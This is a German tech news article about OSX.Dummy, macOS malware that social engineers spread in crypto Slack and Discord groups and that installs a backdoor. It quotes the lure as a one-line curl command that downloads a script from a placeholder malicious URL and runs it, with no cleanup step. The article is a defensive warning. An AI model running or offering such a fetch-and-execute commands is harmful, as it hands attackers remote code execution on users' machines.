Menü
Mac & i

Neue Mac-Malware greift Benutzer von Kryptowährungen an

Der Schädling namens OSX.Dummy kursiert in Slack- und Discord-Gruppen und installiert eine Hintertür.

Von
vorlesen Drucken Kommentare lesen 42 Beiträge
Neue Mac-Malware greift Benutzer von Kryptowährungen an

OSX.Dummy ist eigentlich trivial zu erkennen, doch mittels Social Engineering verbreitet sich der Schädling trotzdem.

(Bild: Patrick Wardle)

Der niederländische Sicherheitsforscher Remco Verhoef warnt vor einem aktuell in der Kryptowährungsszene kursierenden Schädling, der macOS-Maschinen befallen kann. Die OSX.Dummy getaufte Malware hat allerdings einen eher simplen Verbreitungsweg: In Slack- und Discord-Gruppen werden schlichte Codezeilen herumgereicht, die das Opfer im Mac-Terminal ausführen muss. Als Social-Engineering-Ansatz dient dabei, dass sich die Verbreiter als Administratoren oder wichtige Mitglieder der Gruppen ausgeben.

Wie Verhoef erläutert, lauten die Zeilen etwa auf:

cd /tmp && curl -s curl $BOESE_URL > script && chmod +x script && ./script

Dabei zeigt $BOESE_URL auf den Server, auf dem OSX.Dummy liegt. Nach Eingabe und Druck auf Return wird die Malware dann nachgeladen; sie basiert auf einem Python-Skript. Wie der Mac-Security-Experte Patrick Wardle überprüft hat, wurde OSX.Dummy zumindest am Wochenende noch nicht von den bei VirusTotal hinterlegten Anti-Virus-Programmen erkannt.

Zudem greift Apples Malware-Schutz GateKeeper nicht, weil das Skript direkt im Terminal ausgeführt wird. Mit einem Apple-Zertifikat signiert ist der Schädling nicht; im Normalfall würde GateKeeper also anschlagen. Zur Installation ist zudem die Eingabe eines Administratorenpassworts notwendig.

Was OSX.Dummy konkret anrichten kann, ist noch nicht abschließend geklärt. Die Malware öffnet auf dem infizierten Rechner zumindest eine Hintertür, über die die Verfasser beliebigen Code auf dem Mac ausführen können. Zudem verankert sich der Schädling im System, indem er einen sogenannten Launch Daemon aufsetzt.

Der Server, von dem OSX.Dummy nachgeladen wird, scheint in den Niederlanden zu stehen. Die Malware ist mit 34 MByte vergleichsweise groß und enthält verschiedene Libraries, inklusive OpenSSL und V8. Das Beispiel zeigt, dass Nutzer keinesfalls irgendwelche in Foren abgedruckten Terminal-Befehle eingeben sollten – schon gar nicht, wenn diese dann die Eingabe eines Administratorenpassworts verlangen. (bsc)